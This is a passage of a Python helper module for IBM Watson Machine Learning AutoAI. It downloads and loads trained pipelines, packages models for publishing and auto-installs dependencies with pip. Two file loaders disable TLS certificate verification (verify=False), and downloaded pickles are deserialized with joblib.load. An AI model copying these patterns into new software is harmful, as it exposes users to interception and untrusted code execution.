2020.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n__all__ = [\n 'fetch_pipelines',\n 'load_file_from_file_system',\n 'load_file_from_file_system_nonautoai',\n 'NextRunDetailsGenerator',\n 'prepare_auto_ai_model_to_publish_normal_scenario',\n 'prepare_auto_ai_model_to_publish_notebook_normal_scenario',\n 'prepare_auto_ai_model_to_publish',\n 'remove_file',\n 'ProgressGenerator',\n 'is_ipython',\n 'try_import_lale',\n 'try_load_dataset',\n 'check_dependencies_versions',\n 'try_import_autoai_libs',\n 'try_import_tqdm',\n 'try_import_xlrd',\n 'try_import_graphviz',\n 'prepare_cos_client',\n 'create_model_download_link',\n 'create_summary',\n 'prepare_auto_ai_model_to_publish_notebook',\n 'get_node_and_runtime_index',\n 'download_experiment_details_from_file',\n 'prepare_model_location_path',\n 'download_wml_pipeline_details_from_file',\n 'init_cos_client',\n 'check_graphviz_binaries',\n 'try_import_joblib',\n 'get_sw_spec_and_type_based_on_sklearn',\n 'validate_additional_params_for_optimizer',\n 'is_list_composed_from_enum',\n 'validate_optimizer_enum_values'\n]\n\nimport io\nimport json\nimport os\nimport enum\nimport inspect\nfrom contextlib import redirect_stdout\nfrom functools import wraps\nfrom subprocess import check_call\nfrom sys import executable\nfrom tarfile import open as open_tar\nfrom typing import Dict, Union, Tuple, List, TYPE_CHECKING, Optional, Any\nfrom warnings import warn\nfrom zipfile import ZipFile\nfrom collections.abc import Sequence\n\nimport pkg_resources\nimport requests\nfrom packaging import version\n\nfrom .enums import (RegressionAlgorithms, ClassificationAlgorithms, ForecastingAlgorithms, Transformers,\n Metrics, TShirtSize, PredictionType)\nfrom .errors import (MissingPipeline, DataFormatNotSupported, LibraryNotCompatible,\n CannotInstallLibrary, CannotDownloadTrainingDetails, CannotDownloadWMLPipelineDetails,\n VisualizationFailed, AdditionalParameterIsUnexpected, InvalidSequenceValue, NoAvailableMetrics)\n\nif TYPE_CHECKING:\n from io import BytesIO, BufferedIOBase\n from pandas import DataFrame\n from collections import OrderedDict\n from sklearn.pipeline import Pipeline\n from ibm_watson_machine_learning import APIClient\n from ibm_watson_machine_learning.helpers import DataConnection, S3Connection\n from ibm_boto3 import resource, client\n\n\ndef create_model_download_link(file_path: str):\n \"\"\"\n Creates download link and shows it in the jupyter notebook\n\n Parameters\n ----------\n file_path: str, required\n \"\"\"\n if is_ipython():\n from IPython.display import display\n from ibm_watson_machine_learning.utils import create_download_link\n display(create_download_link(file_path))\n\n\ndef fetch_pipelines(run_params: dict,\n path: str,\n wml_client: 'APIClient',\n pipeline_name: str = None,\n load_pipelines: bool = False,\n store: bool = False) -> Tuple[Union[None, Dict[str, 'Pipeline']], bool]:\n \"\"\"\n Helper function to download and load computed AutoAI pipelines (sklearn pipelines).\n\n Parameters\n ----------\n run_params: dict, 
required\n Fetched details of the run/fit.\n\n path: str, required\n Local system path indicating where to store downloaded pipelines.\n\n pipeline_name: str, optional\n Name of the pipeline to download, if not specified, all pipelines are downloaded.\n\n load_pipelines: bool, optional\n Indicator if we load and return downloaded pipelines.\n\n store: bool, optional\n Indicator to store pipelines in local filesystem\n\n wml_client: APIClient, required\n\n Returns\n -------\n List of sklearn Pipelines or None if load_pipelines is set to False.\n \"\"\"\n\n def check_pipeline_nodes(pipeline: dict, request_json: dict, wml_client) -> bool:\n \"\"\"\n Automatically check all pipeline nodes to find an xgboost or lightgbm dependency.\n \"\"\"\n xgboost_estimators = ['XGBClassifierEstimator', 'XGBRegressorEstimator', 'XGBClassifier', 'XGBRegressor']\n lightgbm_estimators = ['LGBMClassifierEstimator', 'LGBMRegressorEstimator', 'LGBMClassifier', 'LGBMRegressor']\n\n # note: check dependencies for estimators and other packages\n estimator_name = pipeline['context']['intermediate_model'].get('pipeline_nodes', [None])[-1]\n if estimator_name in xgboost_estimators:\n check_lale = check_dependencies_versions(request_json, wml_client, 'xgboost')\n\n elif estimator_name in lightgbm_estimators:\n check_lale = check_dependencies_versions(request_json, wml_client, 'lightgbm')\n\n else:\n check_lale = check_dependencies_versions(request_json, wml_client, None)\n\n # TODO: when estimators from other packages become available, update the above!\n # --- end note\n\n return check_lale\n\n joblib = try_import_joblib()\n\n path = os.path.abspath(path)\n pipelines_names = []\n pipelines = {}\n check_lale = True\n\n if wml_client.ICP:\n model_paths = []\n\n # note: iterate over all computed pipelines\n for pipeline in run_params['entity']['status'].get('metrics', []):\n\n # note: fetch and create model paths from file system\n model_path = pipeline['context']['intermediate_model']['location']['model']\n # --- end note\n\n # note: populate available pipeline names\n if pipeline_name is None: # checking all pipelines\n model_paths.append(model_path)\n pipelines_names.append(\n f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\")\n\n # note: check dependencies for estimators\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n\n # checking only chosen pipeline\n elif pipeline_name == f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\":\n model_paths.append(model_path)\n pipelines_names = [f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"]\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n break\n # --- end note\n\n if load_pipelines:\n # Disable printing to suppress warning from ai4ml\n with redirect_stdout(open(os.devnull, \"w\")):\n for model_path, pipeline_name in zip(model_paths, pipelines_names):\n pipelines[pipeline_name] = joblib.load(load_file_from_file_system(wml_client=wml_client,\n file_path=model_path))\n\n if store:\n for name, pipeline in pipelines.items():\n local_model_path = os.path.join(path, name)\n joblib.dump(pipeline, local_model_path)\n print(f\"Selected pipeline stored under: {local_model_path}\")\n\n # note: display download link to the model\n 
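# note (added): the link renders only when running inside IPython/Jupyter (see is_ipython()); otherwise the call below is a no-op\n 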
create_model_download_link(local_model_path)\n # --- end note\n\n else:\n from ibm_boto3 import client\n cos_client = client(\n service_name='s3',\n endpoint_url=run_params['entity']['results_reference']['connection']['endpoint_url'],\n aws_access_key_id=run_params['entity']['results_reference']['connection']['access_key_id'],\n aws_secret_access_key=run_params['entity']['results_reference']['connection']['secret_access_key']\n )\n buckets = []\n filenames = []\n keys = []\n\n for pipeline in run_params['entity']['status'].get('metrics', []):\n model_number = pipeline['context']['intermediate_model']['name'].split('P')[-1]\n model_phase = chose_model_output(model_number)\n\n if pipeline['context']['phase'] == model_phase:\n model_path = f\"{pipeline['context']['intermediate_model']['location']['model']}\"\n\n if pipeline_name is None:\n buckets.append(run_params['entity']['results_reference']['location']['bucket'])\n filenames.append(\n f\"{path}/Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}.pickle\")\n keys.append(model_path)\n pipelines_names.append(\n f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\")\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n elif pipeline_name == f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\":\n buckets = [run_params['entity']['results_reference']['location']['bucket']]\n filenames = [\n f\"{path}/Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}.pickle\"]\n keys = [model_path]\n pipelines_names = [f\"Pipeline_{pipeline['context']['intermediate_model']['name'].split('P')[-1]}\"]\n\n # note: check dependencies for estimators and other packages\n request_json = download_request_json(run_params, pipelines_names[-1], wml_client)\n check_lale = check_pipeline_nodes(pipeline, request_json, wml_client)\n\n break\n\n for bucket, filename, key, name in zip(buckets, filenames, keys, pipelines_names):\n cos_client.download_file(Bucket=bucket, Filename=filename, Key=key)\n if load_pipelines:\n\n # Disable printing to suppress warning from ai4ml\n with redirect_stdout(open(os.devnull, \"w\")):\n pipelines[name] = joblib.load(filename)\n\n if not store:\n if os.path.exists(filename):\n os.remove(filename)\n\n else:\n print(f\"Selected pipeline stored under: {filename}\")\n\n # note: display download link to the model\n create_model_download_link(filename)\n # --- end note\n\n if load_pipelines and pipelines:\n return pipelines, check_lale\n\n elif load_pipelines:\n raise MissingPipeline(\n pipeline_name if pipeline_name is not None else \"global_output pipeline\",\n reason=\"The name of the pipeline is incorrect or there are no pipelines computed.\")\n\n\ndef load_file_from_file_system(wml_client: 'APIClient',\n file_path: str,\n stream: bool = True) -> 'io.BytesIO':\n \"\"\"\n Load file into memory from the file system.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML v4 client.\n\n file_path: str, required\n Path in the file system of the file.\n\n stream: bool, optional\n Indicator to stream data content.\n\n Returns\n -------\n Sklearn Pipeline\n \"\"\"\n # note: prepare the file path\n file_path = file_path.split('auto_ml/')[-1]\n\n if wml_client.default_project_id:\n file_path = f\"{file_path}?project_id={wml_client.default_project_id}\"\n\n else:\n file_path 
= f\"{file_path}?space_id={wml_client.default_space_id}\"\n # --- end note\n\n buffer = io.BytesIO()\n response_with_model = requests.get(\n url=f\"{wml_client.data_assets._href_definitions.get_wsd_model_attachment_href()}auto_ml/{file_path}\",\n headers=wml_client._get_headers(),\n stream=stream,\n verify=False)\n if stream:\n for data in response_with_model.iter_content():\n buffer.write(data)\n else:\n buffer.write(response_with_model.content)\n\n buffer.seek(0)\n\n return buffer\n\n\ndef load_file_from_file_system_nonautoai(wml_client: 'APIClient',\n file_path: str,\n stream: bool = True) -> 'io.BytesIO':\n \"\"\"\n Load file into memory from the file system.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML v4 client.\n\n file_path: str, required\n Path in the file system of the file.\n\n stream: bool, optional\n Indicator to stream data content.\n\n Returns\n -------\n File content\n \"\"\"\n # note: prepare the file path\n\n if wml_client.default_project_id:\n file_path = f\"{file_path}?project_id={wml_client.default_project_id}\"\n\n else:\n file_path = f\"{file_path}?space_id={wml_client.default_space_id}\"\n # --- end note\n\n buffer = io.BytesIO()\n\n response_with_model = requests.get(\n url=f\"{wml_client.data_assets._href_definitions.get_wsd_model_attachment_href()}{file_path}\",\n headers=wml_client._get_headers(),\n stream=stream,\n verify=False)\n\n if stream:\n for data in response_with_model.iter_content():\n buffer.write(data)\n else:\n buffer.write(response_with_model.content)\n\n buffer.seek(0)\n\n return buffer\n\nclass NextRunDetailsGenerator:\n \"\"\"\n Generator class to produce next list of run details.\n\n Parameters\n ----------\n wml_client: APIClient, required\n WML Client Instance\n \"\"\"\n\n def __init__(self, wml_client: 'APIClient', href: str) -> None:\n self.wml_client = wml_client\n self.next_href = href\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.next_href is not None:\n response = requests.get(\n url=f\"{self.wml_client.wml_credentials['url']}{self.next_href}\",\n headers=self.wml_client._get_headers(),\n verify=not self.wml_client.ICP)\n details = response.json()\n self.next_href = details.get('next', {'href': None})['href']\n return details.get('resources', [])\n\n else:\n raise StopIteration\n\n\ndef preprocess_request_json(request_json: Dict, space_id: str) -> Dict:\n \"\"\"Removes unused parts of request.json file got from autoai training.\n Allow to further store model in user space.\"\"\"\n # note: if training was on project_id, change it to space_id as we can deploy only on space\n if 'project_id' in request_json:\n request_json.pop('project_id')\n\n request_json['space_id'] = space_id\n request_json.pop('pipeline') # not needed for other space\n # --- end note\n return request_json\n\n\ndef chose_model_output(model_number: str, is_ml_metrics: bool = True, is_ts_metrics: bool = False) -> str:\n \"\"\"Chose correct path for particular model number\"\"\"\n if is_ml_metrics:\n model_number = int(model_number)\n hpo_c_numbers = (4, 8, 12, 16)\n cognito_numbers = (3, 7, 11, 15)\n hpo_d_numbers = (2, 6, 10, 14)\n pre_hpo_d_numbers = (1, 5, 9, 13)\n\n if model_number in pre_hpo_d_numbers:\n return 'pre_hpo_d_output'\n\n elif model_number in hpo_d_numbers:\n return 'hpo_d_output'\n\n elif model_number in cognito_numbers:\n return 'cognito_output'\n\n elif model_number in hpo_c_numbers:\n return 'hpo_c_output'\n\n else:\n return 'global_output'\n\n elif is_ts_metrics:\n return 
'after_pipeline_execution'\n\n\ndef prepare_auto_ai_model_to_publish_notebook_normal_scenario(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n result_connection,\n cos_client,\n run_params: Dict,\n space_id: str) -> Union[Tuple[str, Dict[str, dict]]]:\n \"\"\"\n Prepares autoai model to publish in Watson Studio via COS.\n Option only for auto-gen notebooks with correct result references on COS.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n model object to publish\n\n result_connection: DataConnection, required\n Connection object with COS credentials and all needed locations for jsons\n\n cos_client: ibm_boto3.resource, required\n initialized COS client\n\n run_params: dictionary, required\n Dictionary with training details\n\n space_id: str, required\n\n Returns\n -------\n String with path to the saved model and jsons in COS.\n \"\"\"\n path = result_connection.location._model_location\n model_number = pipeline_model.split('_')[-1]\n run_id = path.split('/data/')[0].split('/')[-1]\n request_path = f\"{path.split('/data/')[0]}/assets/{run_id}_P{model_number}_{chose_model_output(model_number)}/resources/wml_model/request.json\"\n\n bucket = result_connection.location.bucket\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n # note: only if there was 1 estimator during training\n if 'content_location' not in request_str:\n request_path = f\"{path.split('/data/')[0]}/assets/{run_id}_P{model_number}_compose_model_type_output/resources/wml_model/request.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename='request.json', Key=request_path)\n with open('request.json', 'r') as f:\n request_str = f.read()\n\n request_json: Dict[str, dict] = json.loads(request_str)\n request_json['content_location']['connection'] = run_params['entity']['results_reference']['connection']\n request_json = preprocess_request_json(request_json, space_id)\n artifact_name = f\"autoai_sdk{os.path.sep}{pipeline_model}.pickle\"\n\n return artifact_name, request_json\n\n\n# TODO: remove this function\ndef prepare_auto_ai_model_to_publish_notebook(pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n result_connection,\n cos_client,\n obm: Optional[bool] = False) -> Union[Tuple[Dict[str, dict], str], str]:\n \"\"\"\n Prepares autoai model to publish in Watson Studio via COS.\n Option only for auto-gen notebooks with correct result references on COS.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n model object to publish\n\n result_connection: DataConnection, required\n Connection object with COS credentials and all needed locations for jsons\n\n cos_client: ibm_boto3.resource, required\n initialized COS client\n\n obm: bool, optional\n Indicator if we need to extract OBM data\n\n Returns\n -------\n String with path to the saved model and jsons in COS.\n \"\"\"\n joblib = try_import_joblib()\n\n artifact_type = \".gzip\"\n\n artifact_name = f\"artifact_auto_ai_model{artifact_type}\"\n model_artifact_name = f\"model_.tar.gz\"\n wml_pipeline_definition_name = \"pipeline-model.json\"\n obm_model_name = \"obm_model.zip\"\n temp_model_name = '__temp_model.pickle'\n\n # note: path to the json describing the autoai POD specification\n path = result_connection.location._model_location.split('model.pickle')[0]\n pipeline_model_json_path = f\"{path}pipeline-model.json\"\n schema_path = 
f\"{path}schema.json\"\n\n bucket = result_connection.location.bucket\n\n # note: Check if we have OBM experiment and get paths for obm model and schema\n if obm:\n obm_model_path = f\"{path.split('/data/')[0]}/data/obm/model.zip\"\n schema_path = f\"{path.split('/data/')[0]}/data/obm/schemas.json\"\n cos_client.meta.client.download_file(Bucket=bucket, Filename=obm_model_name, Key=obm_model_path)\n\n # note: need to download model schema and wml pipeline definition json\n cos_client.meta.client.download_file(Bucket=bucket, Filename=wml_pipeline_definition_name,\n Key=pipeline_model_json_path)\n cos_client.meta.client.download_file(Bucket=bucket, Filename='schema.json', Key=schema_path)\n\n with open('schema.json', 'r') as f:\n schema_json = f.read()\n\n # note: update the schema, it has wrong field types\n schema_json = schema_json.replace('fieldType', 'type')\n # --- end note\n\n # note: saved passed model as pickle, for further tar.gz packaging\n joblib.dump(pipeline_model, temp_model_name)\n # --- end note\n\n # note: create a tar.gz file with model pickle, name it as 'model_run_id.tar.gz', model.pickle inside\n with open_tar(model_artifact_name, 'w:gz') as tar:\n tar.add(temp_model_name, arcname='model.pickle')\n\n remove_file(filename=temp_model_name)\n # --- end note\n\n # note: create final zip to publish on WML cloud v4 GA\n with ZipFile(artifact_name, 'w') as zip_file:\n if obm:\n # note: write order is important!\n zip_file.write(obm_model_name)\n zip_file.write(model_artifact_name)\n zip_file.write(wml_pipeline_definition_name)\n\n remove_file(filename=model_artifact_name)\n remove_file(filename=wml_pipeline_definition_name)\n if obm:\n remove_file(filename=obm_model_name)\n # --- end note\n\n return json.loads(schema_json), artifact_name\n\n\ndef prepare_auto_ai_model_to_publish_normal_scenario(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n run_params: dict,\n run_id: str,\n wml_client: 'APIClient',\n space_id: str) -> Union[Tuple[str, Dict[str, dict]]]:\n \"\"\"\n Helper function to specify `content_location` statement for AutoAI models to store in repository.\n\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 'TrainablePipeline'], required\n Model that will be prepared for an upload.\n\n run_params: dict, required\n Fetched details of the run/fit.\n\n run_id: str, required\n Fit/run ID associated with the model.\n\n wml_client: APIClient, required\n\n space_id: str, required\n\n Returns\n -------\n If cp4d: Dictionary with model schema and artifact name to upload, stored temporally in the user local file system.\n else: path name to the stored model in COS\n \"\"\"\n request_json: Dict[str, dict] = download_request_json(run_params, pipeline_model, wml_client)\n # note: fill connection details\n request_json['content_location']['connection'] = run_params['entity']['results_reference']['connection']\n # note: if training was on project_id, change it to space_id as we can deploy only on space\n request_json = preprocess_request_json(request_json, space_id)\n artifact_name = f\"autoai_sdk{os.path.sep}{pipeline_model}.pickle\"\n\n return artifact_name, request_json\n\n\n# TODO: remove this function\ndef prepare_auto_ai_model_to_publish(\n pipeline_model: Union['Pipeline', 'TrainablePipeline'],\n run_params: dict,\n run_id: str,\n wml_client: 'APIClient') -> Union[Tuple[Dict[str, dict], str], str]:\n \"\"\"\n Helper function to download and load computed AutoAI pipelines (sklearn pipelines).\n Parameters\n ----------\n pipeline_model: Union['Pipeline', 
'TrainablePipeline'], required\n Model that will be prepared for an upload.\n run_params: dict, required\n Fetched details of the run/fit.\n run_id: str, required\n Fit/run ID associated with the model.\n wml_client: APIClient, required\n Returns\n -------\n If cp4d: Dictionary with model schema and artifact name to upload, stored temporally in the user local file system.\n else: path name to the stored model in COS\n \"\"\"\n\n joblib = try_import_joblib()\n\n artifact_type = \".tar.gz\" if wml_client.ICP else \".gzip\"\n\n artifact_name = f\"artifact_auto_ai_model{artifact_type}\"\n model_artifact_name = f\"model_{run_id}.tar.gz\"\n wml_pipeline_definition_name = \"pipeline-model.json\"\n obm_model_name = \"obm_model.zip\"\n temp_model_name = '__temp_model.pickle'\n\n # note: prepare file paths of pipeline-model and schema (COS / file system location)\n pipeline_info = run_params['entity']['status'].get('metrics')[-1]\n pipeline_model_path = f\"{pipeline_info['context']['intermediate_model']['location']['pipeline_model']}\"\n schema_path = f\"{pipeline_info['context']['intermediate_model']['schema_location']}\"\n obm_model_path = None\n # --- end note\n\n # note: Check if we have OBM experiment and get paths for obm model and schema\n if 'obm' in run_params['entity']['status'].get('feature_engineering_components', {}):\n obm_model_path = f\"{pipeline_model_path.split('/data/')[0]}/data/obm/model.zip\"\n schema_path = f\"{pipeline_model_path.split('/data/')[0]}/data/obm/schemas.json\"\n\n if wml_client.ICP:\n # note: downloading pipeline-model.json and schema.json from file system on CP4D\n schema_json = load_file_from_file_system(wml_client=wml_client, file_path=schema_path).read().decode()\n pipeline_model_json = load_file_from_file_system(wml_client=wml_client,\n file_path=pipeline_model_path).read().decode()\n with open(wml_pipeline_definition_name, 'w') as f:\n f.write(pipeline_model_json)\n # --- end note\n\n # note: save obm model.zip locally\n if obm_model_path is not None:\n obm_model = load_file_from_file_system(wml_client=wml_client,\n file_path=obm_model_path).read().decode()\n\n with open(obm_model_name, 'w') as f:\n f.write(obm_model)\n # --- end note\n\n else:\n cos_client = init_cos_client(run_params['entity']['results_reference']['connection'])\n bucket = run_params['entity']['results_reference']['location']['bucket']\n\n # note: need to download model schema and wml pipeline definition json\n cos_client.meta.client.download_file(Bucket=bucket, Filename=wml_pipeline_definition_name,\n Key=pipeline_model_path)\n cos_client.meta.client.download_file(Bucket=bucket, Filename='schema.json', Key=schema_path)\n\n with open('schema.json', 'r') as f:\n schema_json = f.read()\n\n # note: save obm model.zip locally\n if obm_model_path is not None:\n cos_client.meta.client.download_file(Bucket=bucket, Filename=obm_model_name, Key=obm_model_path)\n # --- end note\n\n # note: update the schema, it has wrong field types and missing id\n schema_json = schema_json.replace('fieldType', 'type')\n # --- end note\n\n # note: saved passed model as pickle, for further tar.gz packaging\n joblib.dump(pipeline_model, temp_model_name)\n # --- end note\n\n # note: create a tar.gz file with model pickle, name it as 'model_run_id.tar.gz', model.pickle inside\n with open_tar(model_artifact_name, 'w:gz') as tar:\n tar.add(temp_model_name, arcname='model.pickle')\n\n remove_file(filename=temp_model_name)\n # --- end note\n\n with ZipFile(artifact_name, 'w') as zip_file:\n if obm_model_path is not None:\n 
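# note (added, editor's sketch): with the default names above, the archive written below should contain obm_model.zip (OBM case only), model_<run_id>.tar.gz and pipeline-model.json, in that order\n 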
# note: write order is important!\n zip_file.write(obm_model_name)\n zip_file.write(model_artifact_name)\n zip_file.write(wml_pipeline_definition_name)\n\n remove_file(filename=model_artifact_name)\n remove_file(filename=wml_pipeline_definition_name)\n if obm_model_path is not None:\n remove_file(filename=obm_model_name)\n # --- end note\n\n return json.loads(schema_json), artifact_name\n\n\ndef modify_pipeline_model_json(data_location: str, model_path: str) -> None:\n \"\"\"\n Change the location of KB model in pipeline-model.json\n\n Parameters\n ----------\n data_location: str, required\n pipeline-model.json data local path\n\n model_path: str, required\n Path to KB model stored in COS.\n \"\"\"\n with open(data_location, 'r') as f:\n data = json.load(f)\n\n data['pipelines'][0]['nodes'][-1]['parameters']['output_model']['location'] = f\"{model_path}model.pickle\"\n\n with open(data_location, 'w') as f:\n f.write(json.dumps(data))\n\n\ndef init_cos_client(connection: dict) -> 'resource':\n \"\"\"Initiate COS client for further usage.\"\"\"\n from ibm_botocore.client import Config\n from ibm_boto3 import resource\n\n if connection.get('auth_endpoint') is not None and connection.get('api_key') is not None:\n cos_client = resource(\n service_name='s3',\n ibm_api_key_id=connection['api_key'],\n ibm_auth_endpoint=connection['auth_endpoint'],\n config=Config(signature_version=\"oauth\"),\n endpoint_url=connection['endpoint_url']\n )\n\n else:\n cos_client = resource(\n service_name='s3',\n endpoint_url=connection['endpoint_url'],\n aws_access_key_id=connection['access_key_id'],\n aws_secret_access_key=connection['secret_access_key']\n )\n return cos_client\n\n\ndef remove_file(filename: str):\n \"\"\"Helper function to clean user local storage from temporary package files.\"\"\"\n if os.path.exists(filename):\n os.remove(filename)\n\n\nclass ProgressGenerator:\n def __init__(self):\n self.progress_messages = {\n \"pre_hpo_d_output\": 15,\n \"hpo_d_output\": 30,\n \"cognito_output\": 50,\n \"hpo_c_output\": 70,\n \"compose_model_type_output\": 80,\n \"fold_output\": 90,\n \"global_output\": 99,\n # timeseries\n 'after_pipeline_execution': 50,\n 'after_holdout_execution': 80,\n 'after_final_pipelines_generation': 99\n }\n self.total = 100\n self.position = 0\n self.max_position = 5\n\n def get_progress(self, text):\n for i, e in enumerate(self.progress_messages):\n if e in text:\n pos = self.max_position\n self.max_position = max(self.max_position, self.progress_messages[e])\n if pos < self.max_position:\n progress = pos - self.position\n self.position = pos\n return progress\n\n if self.position + 1 >= self.max_position:\n return 0\n else:\n self.position += 1\n return 1\n\n def get_total(self):\n return self.total\n\n\ndef is_ipython():\n \"\"\"Check if code is running in the notebook.\"\"\"\n try:\n name = get_ipython().__class__.__name__\n if name != 'ZMQInteractiveShell':\n return False\n else:\n return True\n\n except Exception:\n return False\n\n\ndef try_import_lale():\n \"\"\"\n Check if lale package is installed in local environment, if not, just download and install it.\n \"\"\"\n lale_version = '0.4.15'\n try:\n try:\n installed_module_version = fallback_to_pip_for_version_check({'name': 'lale'})\n\n except Exception:\n installed_module_version = pkg_resources.get_distribution('lale').version\n\n if version.parse(installed_module_version) < version.parse(lale_version):\n warn(f\"\\\"lale\\\" package version is too low than {lale_version}.\"\n f\"Installing version 
{lale_version}\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", f\"lale=={lale_version}\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"lale failed to install. Please install it manually.\")\n\n except pkg_resources.DistributionNotFound as e:\n warn(f\"\\\"lale\\\" is not installed.\"\n f\"Installing version {lale_version}\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", f\"lale=={lale_version}\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"lale failed to install. Please install it manually.\")\n\n\ndef try_import_autoai_libs():\n \"\"\"\n Check if autoai_libs package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import autoai_libs\n\n except ImportError:\n warn(f\"\\\"autoai_libs\\\" package is not installed. \"\n f\"This is the needed dependency for pipeline model refinery, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"autoai_libs>=1.11.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"autoai_libs>=1.11.0 failed to install. Please install it manually.\")\n\n\ndef try_import_tqdm():\n \"\"\"\n Check if tqdm package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import tqdm\n\n except ImportError:\n warn(f\"\\\"tqdm\\\" package is not installed. \"\n f\"This is the needed dependency for pipeline training, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"tqdm==4.43.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"tqdm==4.43.0 failed to install. Please install it manually.\")\n\n\ndef try_import_xlrd():\n \"\"\"\n Check if xlrd package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import xlrd\n\n except ImportError:\n warn(f\"\\\"xlrd\\\" package is not installed. \"\n f\"This is the needed dependency for loading dataset from xls files, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"xlrd==1.2.0\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"xlrd==1.2.0 failed to install. Please install it manually.\")\n\n\ndef try_import_graphviz():\n \"\"\"\n Check if graphviz package is installed in local environment, if not, just download and install it.\n \"\"\"\n try:\n import graphviz\n\n except ImportError:\n warn(f\"\\\"graphviz\\\" package is not installed. \"\n f\"This is the needed dependency for visualizing data join graph, we will try to install it now...\")\n\n try:\n check_call([executable, \"-m\", \"pip\", \"install\", \"graphviz==0.14\"])\n\n except Exception as e:\n raise CannotInstallLibrary(value_name=e,\n reason=\"graphviz==0.14 failed to install. 
Please install it manually.\")\n\n\ndef try_import_joblib():\n \"\"\"\n Check if joblib is available from scikit-learn or externally and change 'load' method to inform the user about\n compatibility issues.\n \"\"\"\n\n try:\n # note only up to scikit version 0.20.3\n from sklearn.externals import joblib\n\n except ImportError:\n # only for scikit 0.23.*\n import joblib\n\n return joblib\n\n\ndef try_load_dataset(\n buffer: Union['BytesIO', 'BufferedIOBase'],\n sheet_name: str = 0,\n separator: str = ',',\n encoding: Optional[str] = 'utf-8') -> Union['DataFrame', 'OrderedDict']:\n \"\"\"\n Load data into a pandas DataFrame from BytesIO object.\n\n Parameters\n ----------\n buffer: Union['BytesIO', 'BufferedIOBase'], required\n Buffer with bytes data.\n\n sheet_name: str, optional\n Name of the xlsx sheet to read.\n\n separator: str, optional\n csv separator\n\n encoding: str, optional\n\n Returns\n -------\n DataFrame or OrderedDict\n \"\"\"\n from pandas import read_csv, read_excel\n\n try:\n buffer.seek(0)\n data = read_csv(buffer, sep=separator, encoding=encoding)\n\n except Exception as e1:\n try:\n try_import_xlrd()\n buffer.seek(0)\n data = read_excel(buffer, sheet_name=sheet_name)\n\n except Exception as e2:\n raise DataFormatNotSupported(None, reason=f\"Error1: {e1} Error2: {e2}\")\n\n return data\n\n\ndef check_dependencies_versions(request_json: dict, wml_client, estimator_pkg: str) -> bool:\n \"\"\"\n Check packages installed versions and inform the user about needed ones.\n\n Parameters\n ----------\n request_json: dict, required\n Dictionary with request from training saved on user COS or CP4D fs.\n\n wml_client: APIClient, required\n Internal WML client used for sw spec requests.\n\n estimator_pkg: str, required\n Name of the estimator package to check with.\n \"\"\"\n sw_spec_name = request_json.get('hybrid_pipeline_software_specs', [{'name': None}])[-1]['name']\n sw_spec_id = wml_client.software_specifications.get_id_by_name(sw_spec_name)\n sw_spec = wml_client.software_specifications.get_details(sw_spec_id)\n\n packages = sw_spec['entity']['software_specification']['software_configuration']['included_packages']\n\n check_lale = True\n if 'lale' in str(packages):\n check_lale = False\n\n packages_to_check = ['numpy', 'scikit-learn', 'autoai-libs', 'gensim', 'lale']\n\n if estimator_pkg is not None:\n packages_to_check.append(estimator_pkg)\n packages_to_check.append(f'py-{estimator_pkg}')\n\n errored_packages = []\n\n for package in packages:\n if package['name'] in packages_to_check:\n try:\n # note: try to use pip for version check! 
